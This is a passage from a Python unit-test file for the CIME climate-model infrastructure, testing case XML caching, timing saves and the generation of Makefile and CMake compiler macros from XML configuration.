submit_interface = imp.load_source("case_submit_interface", case_submit_path)
sys.argv = ["case.submit", "--batch-args", "'random_arguments_here.%j'",
"--mail-type", "fail", "--mail-user", "'random_arguments_here.%j'"]
submit_interface._main_func(None, True)
###########################################################################
def test_xml_caching(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
active = os.path.join(casedir, "env_run.xml")
backup = os.path.join(casedir, "env_run.xml.bak")
safe_copy(active, backup)
with Case(casedir, read_only=False) as case:
env_run = EnvRun(casedir, read_only=True)
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
self.assertEqual(env_run.get_value("RUN_TYPE"), "branch")
with Case(casedir) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
time.sleep(0.2)
safe_copy(backup, active)
with Case(casedir, read_only=False) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
with Case(casedir, read_only=False) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
time.sleep(0.2)
safe_copy(backup, active)
case.read_xml() # Manual re-sync
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
with Case(casedir) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
time.sleep(0.2)
safe_copy(backup, active)
env_run = EnvRun(casedir, read_only=True)
self.assertEqual(env_run.get_value("RUN_TYPE"), "startup")
with Case(casedir, read_only=False) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
# behind the back detection
with self.assertRaises(CIMEError):
with Case(casedir, read_only=False) as case:
time.sleep(0.2)
safe_copy(backup, active)
with Case(casedir, read_only=False) as case:
case.set_value("RUN_TYPE", "branch")
with self.assertRaises(CIMEError):
with Case(casedir) as case:
time.sleep(0.2)
safe_copy(backup, active)
###########################################################################
def test_configure(self):
###########################################################################
self._create_test(["SMS.f09_g16.X", "--no-build"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"{}.{}".format(CIME.utils.get_full_test_name("SMS.f09_g16.X", machine=self._machine, compiler=self._compiler), self._baseline_name))
manual_config_dir = os.path.join(casedir, "manual_config")
os.mkdir(manual_config_dir)
run_cmd_no_fail("{} --machine={} --compiler={}".format(os.path.join(get_cime_root(), "tools", "configure"), self._machine, self._compiler), from_dir=manual_config_dir)
with open(os.path.join(casedir, "env_mach_specific.xml"), "r") as fd:
case_env_contents = fd.read()
with open(os.path.join(manual_config_dir, "env_mach_specific.xml"), "r") as fd:
man_env_contents = fd.read()
self.assertEqual(case_env_contents, man_env_contents)
###############################################################################
class X_TestSingleSubmit(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_single_submit(self):
###########################################################################
# Skip unless on a batch system and users did not select no-batch
if (not self._hasbatch):
self.skipTest("Skipping single submit. Not valid without batch")
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping single submit. E3SM experimental feature")
if self._machine not in ["sandiatoss3"]:
self.skipTest("Skipping single submit. Only works on sandiatoss3")
# Keep small enough for now that we don't have to worry about load balancing
self._create_test(["--single-submit", "SMS_Ln9_P8.f45_g37_rx1.A", "SMS_Ln9_P8.f19_g16_rx1.A"],
env_changes="unset CIME_GLOBAL_WALLTIME &&")
###############################################################################
class L_TestSaveTimings(TestCreateTestCommon):
###############################################################################
###########################################################################
def simple_test(self, manual_timing=False):
###########################################################################
timing_flag = "" if manual_timing else "--save-timing"
driver = CIME.utils.get_cime_default_driver()
if driver == "mct":
walltime="00:15:00"
else:
walltime="00:30:00"
self._create_test(["SMS_Ln9_P1.f19_g16_rx1.A", timing_flag, "--walltime="+walltime], test_id=self._baseline_name)
statuses = glob.glob("%s/*%s/TestStatus" % (self._testroot, self._baseline_name))
self.assertEqual(len(statuses), 1, msg="Should have had exactly one match, found %s" % statuses)
casedir = os.path.dirname(statuses[0])
with Case(casedir, read_only=True) as case:
lids = get_lids(case)
timing_dir = case.get_value("SAVE_TIMING_DIR")
casename = case.get_value("CASE")
self.assertEqual(len(lids), 1, msg="Expected one LID, found %s" % lids)
if manual_timing:
run_cmd_assert_result(self, "cd %s && %s/save_provenance postrun" % (casedir, TOOLS_DIR))
if CIME.utils.get_model() == "e3sm":
provenance_dirs = glob.glob(os.path.join(timing_dir, "performance_archive", getpass.getuser(), casename, lids[0] + "*"))
self.assertEqual(len(provenance_dirs), 1, msg="provenance dirs were missing")
verify_perms(self, timing_dir)
###########################################################################
def test_save_timings(self):
###########################################################################
self.simple_test()
###########################################################################
def test_save_timings_manual(self):
###########################################################################
self.simple_test(manual_timing=True)
# Machinery for Macros generation tests.
class MockMachines(object):
"""A mock version of the Machines object to simplify testing."""
def __init__(self, name, os_):
"""Store the name."""
self.name = name
self.os = os_
def get_machine_name(self):
"""Return the name we were given."""
return self.name
def get_value(self, var_name):
"""Allow the operating system to be queried."""
assert var_name == "OS", "Build asked for a value not " \
"implemented in the testing infrastructure."
return self.os
def is_valid_compiler(self, _): # pylint:disable=no-self-use
"""Assume all compilers are valid."""
return True
def is_valid_MPIlib(self, _):
"""Assume all MPILIB settings are valid."""
return True
# pragma pylint: disable=unused-argument
def get_default_MPIlib(self, attributes=None):
return "mpich2"
def get_default_compiler(self):
return "intel"
def get_macros(macro_maker, build_xml, build_system):
"""Generate build system ("Macros" file) output from config_compilers XML.
Arguments:
macro_maker - The underlying Build object.
build_xml - A string containing the XML to operate on.
build_system - Either "Makefile" or "CMake", depending on desired output.
The return value is a string containing the build system output.
"""
# Build.write_macros expects file-like objects as input, so
# we need to wrap the strings in StringIO objects.
xml = six.StringIO(str(build_xml))
output = six.StringIO()
output_format = None
if build_system == "Makefile":
output_format = "make"
elif build_system == "CMake":
output_format = "cmake"
else:
output_format = build_system
macro_maker.write_macros_file(macros_file=output,
output_format=output_format, xml=xml)
return str(output.getvalue())
def _wrap_config_compilers_xml(inner_string):
"""Utility function to create a config_compilers XML string.
Pass this function a string containing <compiler> elements, and it will add
the necessary header/footer to the file.
"""
_xml_template = """<?xml version="1.0" encoding="UTF-8"?>
<config_compilers>
{}
</config_compilers>
"""
return _xml_template.format(inner_string)
class MakefileTester(object):
"""Helper class for checking Makefile output.
Public methods:
__init__
query_var
assert_variable_equals
assert_variable_matches
"""
# Note that the following is a Makefile and the echo line must begin with a tab
_makefile_template = """
include Macros
query:
\techo '$({})' > query.out
"""
def __init__(self, parent, make_string):
"""Constructor for Makefile test helper class.
Arguments:
parent - The TestCase object that is using this item.
make_string - Makefile contents to test.
"""
self.parent = parent
self.make_string = make_string
def query_var(self, var_name, env, var):
"""Request the value of a variable in the Makefile, as a string.
Arguments:
var_name - Name of the variable to query.
env - A dict containing extra environment variables to set when calling
make.
var - A dict containing extra make variables to set when calling make.
(The distinction between env and var actually matters only for
CMake, though.)
"""
if env is None:
env = dict()
if var is None:
var = dict()
# Write the Makefile strings to temporary files.
temp_dir = tempfile.mkdtemp()
macros_file_name = os.path.join(temp_dir, "Macros")
makefile_name = os.path.join(temp_dir, "Makefile")
output_name = os.path.join(temp_dir, "query.out")
with open(macros_file_name, "w") as macros_file:
macros_file.write(self.make_string)
with open(makefile_name, "w") as makefile:
makefile.write(self._makefile_template.format(var_name))
environment = os.environ.copy()
environment.update(env)
environment.update(var)
gmake_exe = MACHINE.get_value("GMAKE")
if gmake_exe is None:
gmake_exe = "gmake"
run_cmd_assert_result(self.parent, "%s query --directory=%s 2>&1" % (gmake_exe, temp_dir), env=environment)
with open(output_name, "r") as output:
query_result = output.read().strip()
# Clean up the Makefiles.
shutil.rmtree(temp_dir)
return query_result
def assert_variable_equals(self, var_name, value, env=None, var=None):
"""Assert that a variable in the Makefile has a given value.
Arguments:
var_name - Name of variable to check.
value - The string that the variable value should be equal to.
env - Optional. Dict of environment variables to set when calling make.
var - Optional. Dict of make variables to set when calling make.
"""
self.parent.assertEqual(self.query_var(var_name, env, var), value)
def assert_variable_matches(self, var_name, regex, env=None, var=None):
"""Assert that a variable in the Makefile matches a regex.
Arguments:
var_name - Name of variable to check.
regex - The regex to match.
env - Optional. Dict of environment variables to set when calling make.
var - Optional. Dict of make variables to set when calling make.
"""
self.parent.assertRegexpMatches(self.query_var(var_name, env, var), regex)
class CMakeTester(object):
"""Helper class for checking CMake output.
Public methods:
__init__
query_var
assert_variable_equals
assert_variable_matches
"""
_cmakelists_template = """
include(./Macros.cmake)
file(WRITE query.out "${{{}}}")
"""
def __init__(self, parent, cmake_string):
"""Constructor for CMake test helper class.
Arguments:
parent - The TestCase object that is using this item.
cmake_string - CMake contents to test.
"""
self.parent = parent
self.cmake_string = cmake_string
def query_var(self, var_name, env, var):
"""Request the value of a variable in Macros.cmake, as a string.
Arguments:
var_name - Name of the variable to query.
env - A dict containing extra environment variables to set when calling
cmake.
var - A dict containing extra CMake variables to set when calling cmake.
"""
if env is None:
env = dict()
if var is None:
var = dict()
# Write the CMake strings to temporary files.
temp_dir = tempfile.mkdtemp()
macros_file_name = os.path.join(temp_dir, "Macros.cmake")
cmakelists_name = os.path.join(temp_dir, "CMakeLists.txt")
output_name = os.path.join(temp_dir, "query.out")
with open(macros_file_name, "w") as macros_file:
for key in var:
macros_file.write("set({} {})\n".format(key, var[key]))
macros_file.write(self.cmake_string)
with open(cmakelists_name, "w") as cmakelists:
cmakelists.write(self._cmakelists_template.format(var_name))
environment = os.environ.copy()
environment.update(env)
os_ = MACHINE.get_value("OS")
# cmake will not work on cray systems without this flag
if os_ == "CNL":
cmake_args = "-DCMAKE_SYSTEM_NAME=Catamount"
else:
cmake_args = ""
run_cmd_assert_result(self.parent, "cmake %s . 2>&1" % cmake_args, from_dir=temp_dir, env=environment)
with open(output_name, "r") as output:
query_result = output.read().strip()
# Clean up the CMake files.
shutil.rmtree(temp_dir)
return query_result
def assert_variable_equals(self, var_name, value, env=None, var=None):
"""Assert that a variable in the CMakeLists has a given value.
Arguments:
var_name - Name of variable to check.
value - The string that the variable value should be equal to.
env - Optional. Dict of environment variables to set when calling cmake.
var - Optional. Dict of CMake variables to set when calling cmake.
"""
self.parent.assertEqual(self.query_var(var_name, env, var), value)
def assert_variable_matches(self, var_name, regex, env=None, var=None):
"""Assert that a variable in the CMkeLists matches a regex.
Arguments:
var_name - Name of variable to check.
regex - The regex to match.
env - Optional. Dict of environment variables to set when calling cmake.
var - Optional. Dict of CMake variables to set when calling cmake.
"""
self.parent.assertRegexpMatches(self.query_var(var_name, env, var), regex)
###############################################################################
class G_TestMacrosBasic(unittest.TestCase):
###############################################################################
"""Basic infrastructure tests.
This class contains tests that do not actually depend on the output of the
macro file conversion. This includes basic smoke testing and tests of
error-handling in the routine.
"""
def test_script_is_callable(self):
"""The test script can be called on valid output without dying."""
# This is really more a smoke test of this script than anything else.
maker = Compilers(MockMachines("mymachine", "SomeOS"), version=2.0)
test_xml = _wrap_config_compilers_xml("<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>")
get_macros(maker, test_xml, "Makefile")
def test_script_rejects_bad_xml(self):
"""The macro writer rejects input that's not valid XML."""
maker = Compilers(MockMachines("mymachine", "SomeOS"), version=2.0)
with self.assertRaises(ParseError):
get_macros(maker, "This is not valid XML.", "Makefile")
def test_script_rejects_bad_build_system(self):
"""The macro writer rejects a bad build system string."""
maker = Compilers(MockMachines("mymachine", "SomeOS"), version=2.0)
bad_string = "argle-bargle."
with assertRaisesRegex(self,
CIMEError,
"Unrecognized build system provided to write_macros: " + bad_string):
get_macros(maker, "This string is irrelevant.", bad_string)
###############################################################################
class H_TestMakeMacros(unittest.TestCase):
###############################################################################
"""Makefile macros tests.
This class contains tests of the Makefile output of Build.
Aside from the usual setUp and test methods, this class has a utility method
(xml_to_tester) that converts XML input directly to a MakefileTester object.
"""
def setUp(self):
self.test_os = "SomeOS"
self.test_machine = "mymachine"
self.test_compiler = MACHINE.get_default_compiler() if TEST_COMPILER is None else TEST_COMPILER
self.test_mpilib = MACHINE.get_default_MPIlib(attributes={"compiler":self.test_compiler}) if TEST_MPILIB is None else TEST_MPILIB
self._maker = Compilers(MockMachines(self.test_machine, self.test_os), version=2.0)
def xml_to_tester(self, xml_string):
"""Helper that directly converts an XML string to a MakefileTester."""
test_xml = _wrap_config_compilers_xml(xml_string)
return MakefileTester(self, get_macros(self._maker, test_xml, "Makefile"))
def test_generic_item(self):
"""The macro writer can write out a single generic item."""
xml_string = "<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"
tester = self.xml_to_tester(xml_string)
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
def test_machine_specific_item(self):
"""The macro writer can pick out a machine-specific item."""
xml1 = """<compiler MACH="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>""".format(self.test_machine)
xml2 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
# Do this a second time, but with elements in the reverse order, to
# ensure that the code is not "cheating" by taking the first match.
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_ignore_non_match(self):
"""The macro writer ignores an entry with the wrong machine name."""
xml1 = """<compiler MACH="bad"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>"""
xml2 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
# Again, double-check that we don't just get lucky with the order.
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
def test_os_specific_item(self):
"""The macro writer can pick out an OS-specific item."""
xml1 = """<compiler OS="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>""".format(self.test_os)
xml2 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_mach_other_compiler(self):
"""The macro writer compiler-specific logic works as expected."""
xml1 = """<compiler COMPILER="{}"><CFLAGS><base>a b c</base></CFLAGS></compiler>""".format(self.test_compiler)
xml2 = """<compiler MACH="{}" COMPILER="other"><CFLAGS><base>x y z</base></CFLAGS></compiler>""".format(self.test_machine)
xml3 = """<compiler MACH="{}" COMPILER="{}"><CFLAGS><append>x y z</append></CFLAGS></compiler>""".format(self.test_machine,self.test_compiler)
xml4 = """<compiler MACH="{}" COMPILER="{}"><CFLAGS><base>x y z</base></CFLAGS></compiler>""".format(self.test_machine,self.test_compiler)
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("CFLAGS", "a b c",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("CFLAGS", "a b c",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("CFLAGS", "a b c",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml1+xml3)
tester.assert_variable_equals("CFLAGS", "a b c x y z",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml1+xml4)
tester.assert_variable_equals("CFLAGS", "x y z",var={"COMPILER":self.test_compiler})
tester = self.xml_to_tester(xml4+xml1)
tester.assert_variable_equals("CFLAGS", "x y z",var={"COMPILER":self.test_compiler})
def test_mach_beats_os(self):
"""The macro writer chooses machine-specific over os-specific matches."""
xml1 = """<compiler OS="{}"><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>""".format(self.test_os)
xml2 = """<compiler MACH="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_mach_and_os_beats_mach(self):
"""The macro writer chooses the most-specific match possible."""
xml1 = """<compiler MACH="{}"><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>""".format(self.test_machine)
xml2 = """<compiler MACH="{}" OS="{}"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>"""
xml2 = xml2.format(self.test_machine, self.test_os)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE")
def test_build_time_attribute(self):
"""The macro writer writes conditionals for build-time choices."""
xml1 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH MPILIB="openmpi">/path/to/openmpi</MPI_PATH></compiler>"""
xml3 = """<compiler><MPI_PATH>/path/to/default</MPI_PATH></compiler>"""
tester = self.xml_to_tester(xml1+xml2+xml3)
tester.assert_variable_equals("MPI_PATH", "/path/to/default")
tester.assert_variable_equals("MPI_PATH", "/path/to/mpich", var={"MPILIB": "mpich"})
tester.assert_variable_equals("MPI_PATH", "/path/to/openmpi", var={"MPILIB": "openmpi"})
tester = self.xml_to_tester(xml3+xml2+xml1)
tester.assert_variable_equals("MPI_PATH", "/path/to/default")
tester.assert_variable_equals("MPI_PATH", "/path/to/mpich", var={"MPILIB": "mpich"})
tester.assert_variable_equals("MPI_PATH", "/path/to/openmpi", var={"MPILIB": "openmpi"})
def test_reject_duplicate_defaults(self):
"""The macro writer dies if given many defaults."""
xml1 = """<compiler><MPI_PATH>/path/to/default</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH>/path/to/other_default</MPI_PATH></compiler>"""
with assertRaisesRegex(self,
CIMEError,
"Variable MPI_PATH is set ambiguously in config_compilers.xml."):
self.xml_to_tester(xml1+xml2)
def test_reject_duplicates(self):
"""The macro writer dies if given many matches for a given configuration."""
xml1 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich2</MPI_PATH></compiler>"""
with assertRaisesRegex(self,
CIMEError,
"Variable MPI_PATH is set ambiguously in config_compilers.xml."):
self.xml_to_tester(xml1+xml2)
def test_reject_ambiguous(self):
"""The macro writer dies if given an ambiguous set of matches."""
xml1 = """<compiler><MPI_PATH MPILIB="mpich">/path/to/mpich</MPI_PATH></compiler>"""
xml2 = """<compiler><MPI_PATH DEBUG="FALSE">/path/to/mpi-debug</MPI_PATH></compiler>"""
with assertRaisesRegex(self,
CIMEError,
"Variable MPI_PATH is set ambiguously in config_compilers.xml."):
self.xml_to_tester(xml1+xml2)
def test_compiler_changeable_at_build_time(self):
"""The macro writer writes information for multiple compilers."""
xml1 = """<compiler><SUPPORTS_CXX>FALSE</SUPPORTS_CXX></compiler>"""
xml2 = """<compiler COMPILER="gnu"><SUPPORTS_CXX>TRUE</SUPPORTS_CXX></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SUPPORTS_CXX", "TRUE", var={"COMPILER": "gnu"})
tester.assert_variable_equals("SUPPORTS_CXX", "FALSE")
def test_base_flags(self):
"""Test that we get "base" compiler flags."""
xml1 = """<compiler><FFLAGS><base>-O2</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2")
def test_machine_specific_base_flags(self):
"""Test selection among base compiler flag sets based on machine."""
xml1 = """<compiler><FFLAGS><base>-O2</base></FFLAGS></compiler>"""
xml2 = """<compiler MACH="{}"><FFLAGS><base>-O3</base></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-O3")
def test_build_time_base_flags(self):
"""Test selection of base flags based on build-time attributes."""
xml1 = """<compiler><FFLAGS><base>-O2</base></FFLAGS></compiler>"""
xml2 = """<compiler><FFLAGS><base DEBUG="TRUE">-O3</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-O2")
tester.assert_variable_equals("FFLAGS", "-O3", var={"DEBUG": "TRUE"})
def test_build_time_base_flags_same_parent(self):
"""Test selection of base flags in the same parent element."""
xml1 = """<base>-O2</base>"""
xml2 = """<base DEBUG="TRUE">-O3</base>"""
tester = self.xml_to_tester("<compiler><FFLAGS>"+xml1+xml2+"</FFLAGS></compiler>")
tester.assert_variable_equals("FFLAGS", "-O2")
tester.assert_variable_equals("FFLAGS", "-O3", var={"DEBUG": "TRUE"})
# Check for order independence here, too.
tester = self.xml_to_tester("<compiler><FFLAGS>"+xml2+xml1+"</FFLAGS></compiler>")
tester.assert_variable_equals("FFLAGS", "-O2")
tester.assert_variable_equals("FFLAGS", "-O3", var={"DEBUG": "TRUE"})
def test_append_flags(self):
"""Test appending flags to a list."""
xml1 = """<compiler><FFLAGS><base>-delicious</base></FFLAGS></compiler>"""
xml2 = """<compiler><FFLAGS><append>-cake</append></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-delicious -cake")
# Order independence, as usual.
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-delicious -cake")
def test_machine_specific_append_flags(self):
"""Test appending flags that are either more or less machine-specific."""
xml1 = """<compiler><FFLAGS><append>-delicious</append></FFLAGS></compiler>"""
xml2 = """<compiler MACH="{}"><FFLAGS><append>-cake</append></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_matches("FFLAGS", "^(-delicious -cake|-cake -delicious)$")
def test_machine_specific_base_keeps_append_flags(self):
"""Test that machine-specific base flags don't override default append flags."""
xml1 = """<compiler><FFLAGS><append>-delicious</append></FFLAGS></compiler>"""
xml2 = """<compiler MACH="{}"><FFLAGS><base>-cake</base></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
def test_machine_specific_base_and_append_flags(self):
"""Test that machine-specific base flags coexist with machine-specific append flags."""
xml1 = """<compiler MACH="{}"><FFLAGS><append>-delicious</append></FFLAGS></compiler>""".format(self.test_machine)
xml2 = """<compiler MACH="{}"><FFLAGS><base>-cake</base></FFLAGS></compiler>""".format(self.test_machine)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("FFLAGS", "-cake -delicious")
def test_append_flags_without_base(self):
"""Test appending flags to a value set before Macros is included."""
xml1 = """<compiler><FFLAGS><append>-cake</append></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-delicious -cake", var={"FFLAGS": "-delicious"})
def test_build_time_append_flags(self):
"""Test build_time selection of compiler flags."""
xml1 = """<compiler><FFLAGS><append>-cake</append></FFLAGS></compiler>"""
xml2 = """<compiler><FFLAGS><append DEBUG="TRUE">-and-pie</append></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("FFLAGS", "-cake")
tester.assert_variable_matches("FFLAGS", "^(-cake -and-pie|-and-pie -cake)$", var={"DEBUG": "TRUE"})
def test_environment_variable_insertion(self):
"""Test that ENV{..} inserts environment variables."""
# DO it again with $ENV{} style
xml1 = """<compiler><LDFLAGS><append>-L$ENV{NETCDF} -lnetcdf</append></LDFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("LDFLAGS", "-L/path/to/netcdf -lnetcdf",
env={"NETCDF": "/path/to/netcdf"})
def test_shell_command_insertion(self):
"""Test that $SHELL insert shell command output."""
xml1 = """<compiler><FFLAGS><base>-O$SHELL{echo 2} -fast</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2 -fast")
def test_multiple_shell_commands(self):
"""Test that more than one $SHELL element can be used."""
xml1 = """<compiler><FFLAGS><base>-O$SHELL{echo 2} -$SHELL{echo fast}</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2 -fast")
def test_env_and_shell_command(self):
"""Test that $ENV works inside $SHELL elements."""
xml1 = """<compiler><FFLAGS><base>-O$SHELL{echo $ENV{OPT_LEVEL}} -fast</base></FFLAGS></compiler>"""
tester = self.xml_to_tester(xml1)
tester.assert_variable_equals("FFLAGS", "-O2 -fast", env={"OPT_LEVEL": "2"})
def test_config_variable_insertion(self):
"""Test that $VAR insert variables from config_compilers."""
# Construct an absurd chain of references just to sure that we don't
# pass by accident, e.g. outputting things in the right order just due
# to good luck in a hash somewhere.
xml1 = """<MPI_LIB_NAME>stuff-${MPI_PATH}-stuff</MPI_LIB_NAME>"""
xml2 = """<MPI_PATH>${MPICC}</MPI_PATH>"""
xml3 = """<MPICC>${MPICXX}</MPICC>"""
xml4 = """<MPICXX>${MPIFC}</MPICXX>"""
xml5 = """<MPIFC>mpicc</MPIFC>"""
tester = self.xml_to_tester("<compiler>"+xml1+xml2+xml3+xml4+xml5+"</compiler>")
tester.assert_variable_equals("MPI_LIB_NAME", "stuff-mpicc-stuff")
def test_config_reject_self_references(self):
"""Test that $VAR self-references are rejected."""
# This is a special case of the next test, which also checks circular
# references.
xml1 = """<MPI_LIB_NAME>${MPI_LIB_NAME}</MPI_LIB_NAME>"""
err_msg = r".* has bad \$VAR references. Check for circular references or variables that are used in a \$VAR but not actually defined."
with assertRaisesRegex(self,CIMEError, err_msg):
self.xml_to_tester("<compiler>"+xml1+"</compiler>")
def test_config_reject_cyclical_references(self):
"""Test that cyclical $VAR references are rejected."""
xml1 = """<MPI_LIB_NAME>${MPI_PATH}</MPI_LIB_NAME>"""
xml2 = """<MPI_PATH>${MPI_LIB_NAME}</MPI_PATH>"""
err_msg = r".* has bad \$VAR references. Check for circular references or variables that are used in a \$VAR but not actually defined."
with assertRaisesRegex(self,CIMEError, err_msg):
self.xml_to_tester("<compiler>"+xml1+xml2+"</compiler>")
def test_variable_insertion_with_machine_specific_setting(self):
"""Test that machine-specific $VAR dependencies are correct."""
xml1 = """<compiler><MPI_LIB_NAME>something</MPI_LIB_NAME></compiler>"""
xml2 = """<compiler MACH="{}"><MPI_LIB_NAME>$MPI_PATH</MPI_LIB_NAME></compiler>""".format(self.test_machine)
xml3 = """<compiler><MPI_PATH>${MPI_LIB_NAME}</MPI_PATH></compiler>"""
err_msg = r".* has bad \$VAR references. Check for circular references or variables that are used in a \$VAR but not actually defined."
with assertRaisesRegex(self,CIMEError, err_msg):
self.xml_to_tester(xml1+xml2+xml3)
def test_override_with_machine_and_new_attributes(self):
"""Test that overrides with machine-specific settings with added attributes work correctly."""
xml1 = """
<compiler COMPILER="{}">
<SCC>icc</SCC>
<MPICXX>mpicxx</MPICXX>
<MPIFC>mpif90</MPIFC>
<MPICC>mpicc</MPICC>
</compiler>""".format(self.test_compiler)
xml2 = """
<compiler COMPILER="{}" MACH="{}">
<MPICXX>mpifoo</MPICXX>
<MPIFC MPILIB="{}">mpiffoo</MPIFC>
<MPICC MPILIB="NOT_MY_MPI">mpifouc</MPICC>
</compiler>
""".format(self.test_compiler, self.test_machine, self.test_mpilib)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("SCC", "icc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICXX", "mpifoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPIFC", "mpiffoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICC", "mpicc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("SCC", "icc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICXX", "mpifoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPIFC", "mpiffoo", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester.assert_variable_equals("MPICC", "mpicc", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
def test_override_with_machine_and_same_attributes(self):
"""Test that machine-specific conditional overrides with the same attribute work correctly."""
xml1 = """
<compiler COMPILER="{}">
<MPIFC MPILIB="{}">mpifc</MPIFC>
</compiler>""".format(self.test_compiler, self.test_mpilib)
xml2 = """
<compiler MACH="{}" COMPILER="{}">
<MPIFC MPILIB="{}">mpif90</MPIFC>
</compiler>
""".format(self.test_machine, self.test_compiler, self.test_mpilib)
tester = self.xml_to_tester(xml1+xml2)
tester.assert_variable_equals("MPIFC", "mpif90", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
tester = self.xml_to_tester(xml2+xml1)
tester.assert_variable_equals("MPIFC", "mpif90", var={"COMPILER":self.test_compiler, "MPILIB":self.test_mpilib})
def test_appends_not_overriden(self):
